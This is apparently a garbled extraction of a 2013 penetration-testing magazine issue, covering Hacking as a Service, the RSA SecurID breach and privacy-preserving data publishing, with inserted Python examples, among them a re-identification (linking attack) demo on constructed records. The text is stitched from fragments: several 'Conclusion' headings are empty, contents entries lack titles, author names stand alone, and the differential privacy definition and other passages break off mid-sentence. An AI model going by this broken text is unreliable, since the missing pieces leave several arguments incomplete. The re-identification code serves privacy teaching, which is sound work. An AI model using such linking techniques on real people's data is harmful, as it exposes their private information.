PenTest 2013-5
Improve your Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to focus quickly on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.
www.titania.com
Dear Readers,
We have the pleasure of presenting you the newest issue of PenTest Regular. The Pentester's Development Kit will allow you to take your penetration testing skills to the next level. This month, you will encounter ten articles which will give you a wide scope of techniques and tools and will definitely help you in your career.
DISCLAIMER!
All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.
http://pentestmag.com
CONTENTS
06 Hacking as a Service
10
TECHNIQUES
16 Privacy-Preserving Data Publishing
Privacy-preserving data publishing is an exciting research area. This article presents different technical proposals that answer the demand for simultaneous information sharing and privacy protection. However, the problems of data privacy cannot be fully solved by technology alone. We believe that there is an urgent need to bridge the gap between advanced privacy preservation technology and current policies.
28 Phantom's Cerebrum: Using Python to Work a Botnet
Imagine a ghost robot in every computer, working in the shadows; let's call it the Phantom, performing tasks for its master. The master controls the ghosts through a master brain device; let's call it the cerebrum, much like the device Prof. Xavier had in the X-Men. That device could control the minds of mutants all over the world. In this case, the cerebrum controls the phantoms in each computer of my home and workplace.
TOOLS
This article will outline the implementation of an automated virtual environment to aid in the identification and analysis of potentially malicious software, which can then be extended to proactively detect, and ultimately protect, corporate environments from being infected.
50 Unicorn Magic Help in Reconnaissance
By Aleksandar Bratic
54
60 By Jason Nehrboss
Cisco routers have a number of remote access and management services available. One of the most used and least secure is SNMP. The article shows some of the common techniques and demonstrates a new tool for taking over routers that are vulnerable. Virtually all networking devices support SNMP, and most network monitoring and management software uses it.
By Midnitesnake
The USB Rubber Ducky, or Ducky for short, is a programmable Human Interface Device (HID) that, when inserted into a computer, interacts with the Operating System (OS) by assuming the identity of a certain device: keyboard, mass storage, or a given combination, allowing the injection of keystrokes or applications into the OS's memory. The key point about the Ducky is that it can be programmed in a simple high-level language that a user of any technical skill level can quickly and easily learn.
Hacking as a Service
To gain insight into their security vulnerabilities, companies
perform penetration tests on their websites and infrastructure.
Mostly, the tests are performed ad hoc or perhaps on a yearly basis. This is not sufficient, because the IT landscape changes continuously and new vulnerabilities are discovered all the time. The question that arises is: how can companies keep their security exposure visible despite these changes? In this article, we focus on one possible answer: Hacking as a Service.
To keep the security exposure of the organization visible, up-to-date, and compliant with regulations, periodic penetration testing is needed. Hacking as a Service (HaaS) is a service in which a third party periodically tests the online environment for security issues, compares the results with those of previous tests, and gives the client an up-to-date insight into its exposure.
In this article we describe some key elements of Hacking as a Service, how it works and the dynamic way of vulnerability reporting.
The organization that offers the service (the service provider) needs a highly secured penetration testing environment which includes the preferred penetration testing tools, such as Nmap, DirBuster, Nexpose, Wireshark and Nessus. The penetration testing environment should be used to automate as many tasks as possible, so that the tools are used consistently to detect hosts and to perform port scans and vulnerability scans of infrastructure and applications. This allows comparison of results between tests and enables the client to determine the progress made in remedying the identified risks. The penetration testing environment may also change because of changes in the threat landscape or the release of new penetration testing tools and methodologies.
05/2013 (24) August
[Figure 1: bar chart of open and closed vulnerabilities per severity (Low, Medium, High) across Security test 1 to Security test 4; counts from 0 to 10]
Aside from vulnerability reporting, it is also important to get vulnerabilities addressed. However, the remediation should be done by a separate party, so that the independence of the penetration testers can be maintained. Consider this scenario: the service provider performed a penetration test and delivered to the client a report with detailed information about the observations. After a certain time, the service provider performed the same penetration test with the same scope again, and the same vulnerabilities showed up.
Frequently, the client reads the report but no further action is taken. The report is put in an archive; sometimes some of the vulnerabilities are fixed and the other ones are forgotten over time. The main reason why vulnerabilities are not addressed properly is that nobody has taken responsibility for fixing them, or the follow-up actions are not tracked. That is why vulnerability tracking is needed. The vulnerability tracking module has some critical success factors:
If nobody is responsible, nobody will act. Therefore, every new vulnerability should be assigned to a specific person responsible for remedying it.
It is important to assign a priority to each of the vulnerabilities. The priority tells the assignee in which sequence the vulnerabilities need to be fixed.
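The tracking module described above, as an added example that is not the authors' own tooling: a small Python tracker that diffs one test run's findings against the previous ones, closes findings that no longer reproduce, reopens regressions, keeps an owner per finding, produces a severity-ordered fix queue, and returns the open/closed counts per severity that a trend chart like Figure 1 is drawn from. The Finding class, host addresses and finding names are constructed for the example.

```python
"""Finding tracker for periodic (Hacking as a Service) tests.

Added example with constructed data; the Finding class, hosts and finding
names are assumptions, not the service provider's own module."""
from dataclasses import dataclass

SEVERITY_RANK = {"High": 0, "Medium": 1, "Low": 2}   # lower sorts first


@dataclass
class Finding:
    host: str
    port: int
    name: str
    severity: str
    assignee: str = "unassigned"   # success factor: somebody must own it
    status: str = "Open"
    first_seen: int = 0            # number of the test that first reported it

    @property
    def key(self):
        # Same host, port and finding name => same vulnerability across tests
        return (self.host, self.port, self.name)


def merge_test(tracker, results, test_no):
    """Merge the findings of test `test_no` into `tracker` (key -> Finding).

    Returns (new, still_open, closed) as lists of keys. A finding that was
    closed earlier but shows up again is reopened and counted as new, so a
    regression is not silently swallowed."""
    seen = set()
    new, still_open, closed = [], [], []
    for f in results:
        seen.add(f.key)
        known = tracker.get(f.key)
        if known is None:
            f.first_seen = test_no
            tracker[f.key] = f
            new.append(f.key)
        elif known.status == "Closed":
            known.status = "Open"
            known.first_seen = test_no
            new.append(f.key)
        else:
            still_open.append(f.key)
    for key, f in tracker.items():
        if key not in seen and f.status == "Open":
            f.status = "Closed"      # not reproduced this run: fixed (or out of scope)
            closed.append(key)
    return new, still_open, closed


def assign(tracker, key, owner):
    tracker[key].assignee = owner


def unowned(tracker):
    """Open findings nobody is responsible for: the ones that will not get fixed."""
    return [k for k, f in tracker.items()
            if f.status == "Open" and f.assignee == "unassigned"]


def work_queue(tracker):
    """Open findings in fix order: highest severity first, then oldest first."""
    items = [f for f in tracker.values() if f.status == "Open"]
    return sorted(items, key=lambda f: (SEVERITY_RANK[f.severity], f.first_seen))


def summary(tracker):
    """Open/Closed counts per severity: the numbers a trend chart is drawn from."""
    out = {"Open": {}, "Closed": {}}
    for f in tracker.values():
        out[f.status][f.severity] = out[f.status].get(f.severity, 0) + 1
    return out


def run_demo():
    """Two constructed test runs against the same scope."""
    tracker = {}
    test1 = [
        Finding("10.0.0.5", 443, "TLS 1.0 enabled", "Medium"),
        Finding("10.0.0.5", 22, "Weak SSH ciphers", "Low"),
        Finding("10.0.0.8", 80, "SQL injection in /login", "High"),
    ]
    test2 = [
        Finding("10.0.0.5", 443, "TLS 1.0 enabled", "Medium"),
        Finding("10.0.0.8", 80, "SQL injection in /login", "High"),
        Finding("10.0.0.9", 8080, "Default Tomcat credentials", "High"),
    ]
    r1 = merge_test(tracker, test1, 1)
    assign(tracker, ("10.0.0.8", 80, "SQL injection in /login"), "web-team")
    r2 = merge_test(tracker, test2, 2)
    return tracker, r1, r2


if __name__ == "__main__":
    tracker, r1, r2 = run_demo()
    print("test 2: new=%d still open=%d closed=%d" % tuple(len(x) for x in r2))
    for f in work_queue(tracker):
        print(f.severity, f.host, f.port, f.name, "->", f.assignee)
    print("unowned:", unowned(tracker))
    print(summary(tracker))
```

Between the two runs the SSH finding disappears and is closed, the SQL injection and TLS findings are still open, the Tomcat finding is new, and two open findings still have no owner; those two are exactly the ones the text warns will be forgotten.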
Conclusion
Rob Muris
Trajce Dimkov
Trajce Dimkov holds a PhD in Information Security with a focus on physical penetration and social engineering methodologies. With over 6 years of experience, Trajce is part of the Security & Privacy Team of Deloitte Netherlands, where he is involved in a number of penetration testing assignments.
In 2011 Lockheed Martin and several other major United States defense contractors reported attempted security breaches identified as part of an attack relating to the same advanced persistent threat [14]. The threat agent used a zero-day weakness in the RSA SecurID token to attempt to infiltrate the networks of the defense contractor victims [10]. While the attack on the defense contractors was largely unsuccessful in exfiltrating proprietary and sensitive data, it was later confirmed that the most alarming compromise had already taken place [1]. The zero-day weakness in RSA's SecurID token was later confirmed by RSA to be traceable to a previous attack in which RSA's proprietary seed values for the technology were stolen [1].
The breach at RSA was a multiphase compromise that began with careful research by the threat agent over a sustained period of time [10]. After a series of vulnerable employees had been identified by the threat agent, a spear phishing e-mail was distributed containing a malicious Excel spreadsheet.
Conclusions
[1] Coviello, A. W. (2011, June 06). Open Letter to RSA Customers. Retrieved October 22, 2012, from RSA: http://www.eweek.com/c/a/Security/RSA-Will-Replace-SecurID-Tokens-in-Response-to-Lockheed-Martin-Attack-409915/
[2] FireEye Inc. (2012). Cyber Attacks on Government. Milpitas: FireEye Inc.
[3] Gorman, S., & Tibken, S. (2011, June 07). Security Tokens Take Hit. Retrieved October 20, 2012, from Wall Street Journal: http://online.wsj.com/article/SB10001424052702304906004576369990616694366.html
[4] Hazlewood, V. (2006). Defense-In-Depth: An Information Assurance Strategy for the Enterprise. La Jolla: San Diego Supercomputer Center.
[5] Imperva. (2011). Hacker Intelligence Summary Report. Redwood Shores: Imperva.
[6] Kushner, D. (2013). The Real Story of Stuxnet. IEEE Spectrum, 48-53.
[7] Maiffert, M., & Lentz, R. (2011). How Operation Aurora, Trojans, bots, and other targeted attacks are overrunning today's network defenses. Milpitas: FireEye and Modern Malware Exposed.
[8] Masood, R., Um-e-Ghazia, U., & Anwar, Z. (2011). SWAM: Stuxnet Worm Analysis in Metasploit. Frontiers of Information Technology, 142-147.
[9] Miller, R. (2012, July 1). Advanced Persistent Threats: Defending From The Inside Out. Targeted Attacks, pp. 1-16.
[10] Rashid, F. Y. (2011, June 07). RSA Will Replace SecurID Tokens in Response to Lockheed Martin Attack. Retrieved October 22, 2012, from eWeek: http://www.eweek.com/c/a/Security/RSA-Will-Replace-SecurID-Tokens-in-Response-to-Lockheed-Martin-Attack-409915/
[11] Sanger, D. E., Barboza, D., & Perlroth, N. (2013, February 19). Chinese Army Unit Is Seen as Tied to Hacking Against U.S. The New York Times, p. A1.
[12] Schmitt, M. N., et al. (2013). The Tallinn Manual. Cambridge: Cambridge University Press.
[13] Stallings, W., & Brown, L. (2012). Computer Security: Principles and Practice. Upper Saddle River: Prentice Hall.
[14] Woodburn, D. (2011, June 13). Lockheed hack scares away RSA partners. Computer Reseller News, p. 1.
Lance Cleghorn
TECHNIQUES
Privacy-Preserving Data Publishing
Privacy-Preserving Data Publishing (PPDP) is concerned mainly with the feasibility of anonymizing and publishing person-specific data for data mining without compromising the privacy of individuals.
Data collection and publishing are ubiquitous in today's world. Many organizations such as governmental agencies, hospitals, and financial companies collect and disseminate various person-specific data for research and business purposes. Governments worldwide systematically collect personal information about their citizens through censuses, and these data are released to the public for demographic research. In the medical domain, access to high-quality healthcare data is a vital requirement for informed decision-making by medical practitioners and researchers. Grocery stores collect a large amount of customer purchase data via store courtesy cards; these data are analyzed to model customer behaviour and are used by advertising companies. In the online world, web sites and service providers (Google, for example) collect the search requests of users for future analysis. The data release by AOL is a unique example of this kind [3]. Finally, the emergence of new technologies such as RFID tags, GPS-based devices, and smartphones raises new privacy concerns. These devices are used extensively in many network systems including mass transportation, car navigation, and healthcare management. The collected trajectory data captures the detailed movements of the tagged objects, offering tremendous opportunities for mining useful knowledge. However, this trajectory data contains the locations people visited and thus reveals identifiable sensitive information such as social customs, religious inclination, and sexual preferences. Thus, data about individuals gets collected at various places in various ways.
This data offers tremendous opportunities for mining useful information, but also threatens personal privacy. Data mining is the process of extracting useful, interesting, and previously unknown information from large datasets. Due to the rapid advance in the storage, processing, and networking capabilities of computing devices, the collected data can now be easily analyzed to infer valuable information for research and business purposes. Data from different sources can be integrated and further analyzed to gain better insights. The success of data mining relies on the availability of high quality data and effective information sharing. Since data mining is often a key component of many systems for business information, national security, and monitoring and surveillance, the public has acquired a negative impression of data mining as a technique that intrudes on personal privacy. This lack of trust has become an obstacle to the sharing of personal information for the advancement of the technology.
Real-Life Examples
The current practice in data sharing primarily relies on policies and guidelines about the types of data that can be shared, and on agreements on the use of shared data. This approach alone may lead to excessive data distortion or insufficient protection. For example, the most common practice is to remove the identifiable attributes (such as name and social security number) of individuals before releasing the data. This simple technique looks innocuous, but in reality it fails to protect the privacy of record holders. Also, contracts and agreements cannot prevent an insider from intentionally performing privacy attacks or even stealing data. In this section, we present a number of real-world attacks to emphasize the need for privacy-preserving techniques and to illustrate the challenges in developing such tools.
The most illustrious privacy attack was demonstrated by Sweeney [8]. In Massachusetts, the Group Insurance Commission (GIC) collected the medical data of state employees. The data set had no identifiable attributes such as name, social security number or phone number and was thus believed to be anonymous. GIC gave a copy of the data to researchers and sold a copy to industry. However, the data set did contain demographic information such as date of birth, gender, and ZIP code. Sweeney reported that 87% of the U.S. population can be uniquely identified by 5-digit ZIP code, gender and date of birth: it is not common to find many people with the same date of birth, less likely that they live in the same place, and less likely still that they also share the same gender. She bought a copy of the Massachusetts voter registration list for $20 and identified the record of William Weld, governor of the state of Massachusetts, by joining the two tables. This kind of attack, where external data is used to identify records in an anonymous data set, is called a linking attack. Concern about linking attacks has escalated in recent years due to the ease of collecting external information over the Internet.
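The linking attack described above, as an added example that is not from the article (the records are constructed, not the GIC or voter data, and the column names are assumptions): join a released table that carries only ZIP code, gender and date of birth against a public voter list on those three attributes, report which rows link to exactly one person, compute the k of k-anonymity, and show that generalizing the quasi-identifier (3-digit ZIP, decade of birth) in both tables breaks the join.

```python
"""Linking attack on a de-identified table, and the k-anonymity it violates.

Added example with constructed records (not the GIC or voter data); the
column names are assumptions."""
from collections import Counter, defaultdict

QUASI = ("zip", "sex", "dob")   # quasi-identifier: attributes shared with public data

# Constructed "medical" table: direct identifiers removed, as GIC did.
MEDICAL = [
    {"zip": "02138", "sex": "M", "dob": "1945-07-31", "diagnosis": "hepatitis"},
    {"zip": "02138", "sex": "F", "dob": "1962-03-12", "diagnosis": "flu"},
    {"zip": "02139", "sex": "F", "dob": "1962-03-12", "diagnosis": "HIV"},
    {"zip": "02139", "sex": "M", "dob": "1947-11-02", "diagnosis": "flu"},
]
# Constructed public "voter" table: same quasi-identifier plus the name.
VOTERS = [
    {"name": "Voter A", "zip": "02138", "sex": "M", "dob": "1945-07-31"},
    {"name": "Voter B", "zip": "02138", "sex": "F", "dob": "1962-03-12"},
    {"name": "Voter C", "zip": "02139", "sex": "F", "dob": "1962-03-12"},
    {"name": "Voter D", "zip": "02139", "sex": "M", "dob": "1947-11-02"},
    {"name": "Voter E", "zip": "02139", "sex": "M", "dob": "1947-11-02"},
]


def qid(rec, quasi=QUASI):
    return tuple(rec[a] for a in quasi)


def link(medical, voters, quasi=QUASI):
    """Join both tables on the quasi-identifier: {medical row index: [names]}."""
    by_qid = defaultdict(list)
    for v in voters:
        by_qid[qid(v, quasi)].append(v["name"])
    return {i: by_qid.get(qid(m, quasi), []) for i, m in enumerate(medical)}


def reidentified(medical, voters, quasi=QUASI):
    """Rows that link to exactly one voter: name and diagnosis are now joined."""
    return {i: (names[0], medical[i]["diagnosis"])
            for i, names in link(medical, voters, quasi).items() if len(names) == 1}


def k_anonymity(table, quasi=QUASI):
    """k = size of the smallest equivalence class on the quasi-identifier."""
    return min(Counter(qid(r, quasi) for r in table).values())


def generalize(rec):
    """Coarsen the quasi-identifier (3-digit ZIP, decade of birth); the
    sensitive attribute is left untouched. Applied to both tables, the join
    no longer singles anyone out."""
    g = dict(rec)
    g["zip"] = rec["zip"][:3] + "**"
    g["dob"] = rec["dob"][:3] + "0s"
    return g


if __name__ == "__main__":
    print("k of released table:", k_anonymity(MEDICAL))
    print("re-identified:", reidentified(MEDICAL, VOTERS))
    gm = [generalize(r) for r in MEDICAL]
    print("k after generalization:", k_anonymity(gm))
    print("re-identified after:", reidentified(gm, [generalize(v) for v in VOTERS]))
```

Three of the four released rows link to exactly one voter, because every row sits in an equivalence class of size one (k = 1). After generalization each class holds two rows (k = 2), every row links to several voters, and no diagnosis can be pinned on a named person from these two tables alone.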
Not all linking attacks require external information. Sometimes the semantic content of the data itself reveals the identity of a user. The AOL data release is a notable example. On August 6, 2006, AOL released a 2GB file containing the search queries of 650,000 of its users: approximately 20 million search queries collected over a three-month period. As a privacy protection mechanism, AOL removed all user identities except for the search queries and assigned a random number to each of its users. Three days later, two New York Times reporters identified and interviewed user #4417749 from the released data [3]. Ms. Thelma Arnold was re-identified from the semantic information in her search queries. She said, "We all have a right to privacy. Nobody should have found this all out."
Netflix, a movie rental service, announced a $1,000,000 prize for a 10% improvement of its recommendation system. To assist the competition, it also provided a real data set containing 100 million ratings of 18,000 movie titles by 480,000 randomly chosen users. According to the Netflix website, "To protect customer privacy, all personal information identifying individual customers has been removed and all customer ids have been replaced by randomly assigned ids." Narayanan and Shmatikov shortly afterwards attacked the Netflix data by linking it with information from the Internet Movie Database (IMDb) site, where users post their reviews non-anonymously [7]. They showed that with 8 movie ratings (of which 2 may be completely wrong) and dates that may have a 14-day error, 99% of records can be uniquely identified in the data set. For 68%, two ratings and dates (with a 3-day error) are sufficient.
It is evident from the above examples that mere removal of personal information does not ensure privacy for the users. To overcome this obstacle, research on Privacy-Preserving Data Publishing (PPDP) is concerned mainly with the feasibility of anonymizing and publishing person-specific data for data mining without compromising the privacy of individuals. The research is also concerned with designing a unified framework of algorithms for anonymizing large data sets in various real-life data publishing scenarios. In the following section, we elaborate on the different phases of privacy-preserving data publishing and discuss different real-life data publishing scenarios.
Privacy Models
Table 1(a). Raw patient data
Job       Sex     Age  Disease
Engineer  Male    35   Hepatitis
Engineer  Male    38   Hepatitis
Lawyer    Male    38   HIV
Writer    Female  30   Flu
Writer    Female  33   HIV
Dancer    Male    30   HIV
Dancer    Female  30   HIV

Table 1(b). Anonymized patient data
ID  Job           Sex     Age      Disease
1   Professional  Male    [35-40)  Hepatitis
2   Professional  Male    [35-40)  Hepatitis
3   Professional  Male    [35-40)  HIV
4   Writer        Female  [30-35)  Flu
5   Writer        Female  [30-35)  HIV
6   Dancer        *       30       HIV
7   Dancer        *       30       HIV
all table. The notion of personalized privacy allows each record owner to specify her own privacy level. This model assumes that a sensitive attribute has a taxonomy tree and each record owner specifies a guarding node in the taxonomy tree. All of these models, which are known as partition-based privacy models, partition the data table into groups and provide different guarantees about the anonymized data based on assumptions about the adversary's background knowledge. Recent research shows that algorithms that satisfy partition-based privacy models are vulnerable to various privacy attacks and do not provide the claimed privacy guarantee.
Differential privacy has received considerable attention as a substitute for partition-based privacy models in privacy-preserving data publishing. Differential privacy provides strong privacy guarantees independent of an adversary's background knowledge, computational power or subsequent behavior. Partition-based privacy models ensure privacy by imposing syntactic constraints on the output: for example, the output is required to be indistinguishable among k records, or the sensitive value is required to be well represented in every equivalence group. Differential privacy instead guarantees that an adversary learns nothing more about an individual regardless of whether her record is present in or absent from the data. Informally, a differentially private output is insensitive to any particular record: if a user opted in to the database, there would not be a significant change in any computation based on the database. This assures every individual that a privacy breach will not be a result of participating in the database. Below we present the formal definition of the differential privacy model. A general overview of differential privacy can be found in the recent survey [5].
Differential Privacy
A randomized algorithm Ag is differentially private if, for all data sets D and D′ whose symmetric difference contains at most one record (that is, |D △ D′| ≤ 1), and for all possible anonymized outputs,
Anonymization Techniques
Table 2(a). Bucketized quasi-identifier table
Job       Sex     Age  Bucket
Engineer  Male    35   1
Engineer  Male    38   2
Lawyer    Male    38   1
Writer    Female  30   3
Writer    Female  33   2
Dancer    Male    30   3
Dancer    Female  30   3

Table 2(b). Bucketized sensitive-attribute table
Bucket  Disease
1       Hepatitis
1       HIV
2       Hepatitis
2       HIV
3       Flu
3       HIV
3       HIV
Generalization
Generalization provides better data utility than suppression by replacing the specific value with a more general value. While suppression works in a binary fashion (keep the original value or suppress it), generalization has a number of intermediate states according to a taxonomy tree for each attribute. Figure 2 depicts the taxonomy trees for the attributes Job, Sex and Age. For example, in Table 1(b) the values Engineer and Lawyer are replaced by the more general value Professional according to the taxonomy tree. Generalization techniques can be classified mainly into two categories: global and local. In global generalization, all instances of a value are mapped to the same general value, while in local generalization different instances can be generalized to different general values. A range of algorithms have been proposed that use generalization to enforce different privacy models [6].
Bucketization
Unlike generalization and suppression, bucketization does not modify the QID and the sensitive attribute (SA), but de-associates the relationship between the two. However, it thus also disguises the correlation between the SA and the other attributes, and therefore hinders data analysis that depends on such correlation. Bucketization was proposed to achieve ℓ-diversity. It divides all the records into different buckets in such a way that each bucket contains distinct values of the sensitive attribute. Tables 2(a) and 2(b) are the bucketized data, which satisfies 2-diversity for the patient data of Table 1(a).
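Generalization and bucketization applied to the article's Table 1(a), as an added example that is not the article's own code: a global generalization with an assumed job taxonomy (Engineer, Lawyer to Professional; Writer, Dancer to Artist) and 5-year age ranges, the bucket assignment of Table 2(a), and the k-anonymity and ℓ-diversity checks a publisher would run before release. It also shows that keeping the Sex column leaves the lone male dancer in an equivalence class of one, and that a careless bucket assignment loses 2-diversity.

```python
"""Generalization and bucketization on Table 1(a), with k-anonymity and
l-diversity checks.

Added example; the job taxonomy and the 5-year age ranges are assumptions
modelled on the article's Table 1(b)."""
from collections import Counter, defaultdict

# Table 1(a): (Job, Sex, Age, Disease); Disease is the sensitive attribute.
PATIENTS = [
    ("Engineer", "Male",   35, "Hepatitis"),
    ("Engineer", "Male",   38, "Hepatitis"),
    ("Lawyer",   "Male",   38, "HIV"),
    ("Writer",   "Female", 30, "Flu"),
    ("Writer",   "Female", 33, "HIV"),
    ("Dancer",   "Male",   30, "HIV"),
    ("Dancer",   "Female", 30, "HIV"),
]
# One level of an assumed taxonomy tree for Job.
JOB_PARENT = {"Engineer": "Professional", "Lawyer": "Professional",
              "Writer": "Artist", "Dancer": "Artist"}


def age_range(age, width=5):
    """Generalize an age to the half-open range of the given width."""
    lo = age - age % width
    return "[%d-%d)" % (lo, lo + width)


def global_generalize(table, job=True, sex=False, width=5):
    """Global generalization: every instance of a value maps to the same
    general value. Returns rows as (QID tuple, sensitive value)."""
    out = []
    for j, s, a, d in table:
        q = (JOB_PARENT[j] if job else j, "*" if sex else s, age_range(a, width))
        out.append((q, d))
    return out


def k_anonymity(rows):
    """Size of the smallest equivalence class on the QID."""
    return min(Counter(q for q, _ in rows).values())


def l_diversity(rows):
    """Smallest number of distinct sensitive values in any equivalence class."""
    groups = defaultdict(set)
    for q, d in rows:
        groups[q].add(d)
    return min(len(v) for v in groups.values())


def bucketize(table, bucket_of):
    """Bucketization: the QID table (2(a)) and the sensitive table (2(b))
    share only a bucket id, so a row's disease hides among its bucket mates."""
    qid_table = [(j, s, a, b) for (j, s, a, _), b in zip(table, bucket_of)]
    sa_table = [(b, d) for (_, _, _, d), b in zip(table, bucket_of)]
    return qid_table, sa_table


def bucket_diversity(sa_table):
    """l-diversity of a bucketized sensitive table."""
    groups = defaultdict(set)
    for b, d in sa_table:
        groups[b].add(d)
    return min(len(v) for v in groups.values())


if __name__ == "__main__":
    raw = [((j, s, a), d) for j, s, a, d in PATIENTS]
    print("raw table: k =", k_anonymity(raw))
    kept_sex = global_generalize(PATIENTS)
    print("job + age generalized, sex kept: k =", k_anonymity(kept_sex))
    g = global_generalize(PATIENTS, sex=True)
    print("sex suppressed too: k =", k_anonymity(g), "l =", l_diversity(g))
    _, sa = bucketize(PATIENTS, [1, 2, 1, 3, 2, 3, 3])   # assignment of Table 2(a)
    print("bucketized as in Table 2: l =", bucket_diversity(sa))
    _, bad = bucketize(PATIENTS, [1, 1, 2, 2, 3, 3, 3])
    print("naive bucketing by row order: l =", bucket_diversity(bad))
```

The raw table is only 1-anonymous. Generalizing Job and Age while keeping Sex still leaves k = 1, because (Artist, Male, [30-35)) contains a single record; suppressing Sex as well gives k = 3 with 2-diverse classes. The bucket assignment of Table 2(a) is 2-diverse, whereas simply bucketing consecutive rows puts two Hepatitis records alone in bucket 1 and drops to 1-diversity.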
Input Perturbation
This approach modifies the underlying data randomly, either by adding noise to numerical values or by replacing categorical values with other values from the domain [2]. The input-perturbed data are useful at the aggregate level (such as average or sum), but not at the record level: data recipients can no longer interpret the semantics of each individual record. Yet this is a useful technique if the applications do not require preserving data
Output Perturbation
This approach first computes the correct result and outputs a perturbed version of the result by adding noise. This technique is often used to achieve differential privacy. For example, the Laplace mechanism, an output perturbation approach, takes as inputs a data set D, a function f, and the privacy parameter. The privacy parameter determines the magnitude of the noise added to the output. The mechanism first computes the true output f(D), and then returns the perturbed answer f(D) + Lap(·), where Lap(·) is a random variable sampled from a Laplace distribution with mean 0 whose scale, and hence variance (twice the square of the scale), is set from the privacy parameter.
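The Laplace mechanism, as an added example that is not the article's code: a Laplace sampler by inverse CDF, the mechanism applied to a counting query over a constructed record list, and a direct check of the differential privacy guarantee, namely that the ratio of output densities for two data sets differing in one record never exceeds e^ε. The scale Δf/ε (the sensitivity of f divided by the privacy parameter ε) is the standard choice from the differential privacy literature, not a detail stated on this page.

```python
"""Output perturbation with the Laplace mechanism.

Added example; the scale sensitivity / epsilon is the standard choice from
the differential-privacy literature, not something stated on the page."""
import math
import random


def laplace_sample(scale, rng):
    """One draw from Laplace(mean 0, scale b) by inverse CDF; variance 2*b^2."""
    u = rng.random() - 0.5                         # uniform on [-0.5, 0.5)
    u = max(min(u, 0.5 - 1e-12), -0.5 + 1e-12)     # keep log() finite
    return -scale * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))


def laplace_mechanism(data, f, sensitivity, epsilon, rng):
    """Return f(data) + Lap(sensitivity / epsilon)."""
    return f(data) + laplace_sample(sensitivity / epsilon, rng)


def count_hiv(records):
    """A counting query: adding or removing one record changes it by at most 1,
    so its sensitivity is 1."""
    return sum(1 for r in records if r == "HIV")


def release(data, sensitivity, epsilon, seed=1):
    """Seeded release of the HIV count, for reproducible runs."""
    return laplace_mechanism(data, count_hiv, sensitivity, epsilon, random.Random(seed))


def laplace_pdf(x, mean, scale):
    return math.exp(-abs(x - mean) / scale) / (2.0 * scale)


def max_density_ratio(f_d, f_d2, sensitivity, epsilon):
    """Largest ratio of output densities for neighbouring data sets over a
    grid of outputs. For the Laplace mechanism it never exceeds exp(epsilon):
    that ratio bound is the differential privacy guarantee."""
    scale = sensitivity / epsilon
    grid = [i / 4.0 for i in range(-80, 81)]
    return max(laplace_pdf(x, f_d, scale) / laplace_pdf(x, f_d2, scale) for x in grid)


def sample_stats(scale, n=20000, seed=7):
    """Empirical mean and variance of the sampler (expect 0 and 2*scale^2)."""
    rng = random.Random(seed)
    xs = [laplace_sample(scale, rng) for _ in range(n)]
    mean = sum(xs) / n
    var = sum((x - mean) ** 2 for x in xs) / n
    return mean, var


if __name__ == "__main__":
    # Constructed: D and D2 differ in exactly one record.
    D = ["HIV", "Flu", "HIV", "Hepatitis", "HIV"]
    D2 = D[:-1]
    eps = 0.5
    print("true count:", count_hiv(D), "released:", release(D, 1, eps))
    print("max density ratio:", max_density_ratio(count_hiv(D), count_hiv(D2), 1, eps),
          "<= e^eps =", math.exp(eps))
    print("mean, variance of Lap(2):", sample_stats(2.0))
```

With ε = 0.5 and sensitivity 1 the noise has scale 2 and variance 8, and the density ratio between the two neighbouring data sets peaks at exactly e^0.5 ≈ 1.65; a larger ε shrinks the noise and loosens that bound accordingly.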
Utility Metrics
While protecting privacy is a critical element in data publishing, it is equally important to preserve the utility of the published data, because this is the primary reason for publication. A number of utility metrics have been proposed to quantify the information that is present in the anonymized data. Data publishers use these metrics to evaluate and optimize the utility of the anonymized data. In general, utility metrics can be classified into two categories: general purpose metrics and special purpose metrics.
General Purpose Metric
In many cases, the data publisher does not know how the released data will be used by the data recipient. In such cases, the data publisher uses a general purpose metric that measures the similarity between the original data and the anonymized data. The objective is to minimize the distortion in the anonymized data. The simplest and most intuitive measure is to count the number of anonymization operations performed on the data set. For example, in the case of suppression, the data utility is measured by counting the number of suppressed values: less suppression means more utility. Similarly, for generalization, the information loss is measured by the number of generalization steps performed. Other metrics include the Loss Metric (LM), Normalized Certainty Penalty (NCP), and Discernibility Metric (DM).
References
[1] N. R. Adam and J. C. Wortman. Security control methods for statistical databases. ACM Computing Surveys, 21(4):515-556, 1989.
[2] R. Agrawal and R. Srikant. Privacy preserving data mining. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD), pages 439-450, 2000.
[3] M. Barbaro and T. Zeller. A face is exposed for AOL searcher no. 4417749. New York Times, August 9, 2006.
[4] D. M. Carlisle, M. L. Rodrian, and C. L. Diamond. California inpatient data reporting manual, medical information reporting for California, 5th edition. Technical report, Office of Statewide Health Planning and Development, July 2007.
[5] C. Dwork. A firm foundation for private data analysis. Communications of the ACM, 54(1):86-95, 2011.
[6] B. C. M. Fung, K. Wang, R. Chen, and P. S. Yu. Privacy-preserving data publishing: A survey of recent developments. ACM Computing Surveys, 42(4):1-53, June 2010.
[7] A. Narayanan and V. Shmatikov. Robust de-anonymization of large sparse datasets. In Proceedings of the IEEE Symposium on Security and Privacy (S&P), pages 111-125, 2008.
[8] L. Sweeney. k-anonymity: A model for protecting privacy. International Journal on Uncertainty, Fuzziness and Knowledge-based Systems, volume 10, pages 557-570, 2002.
Conclusion
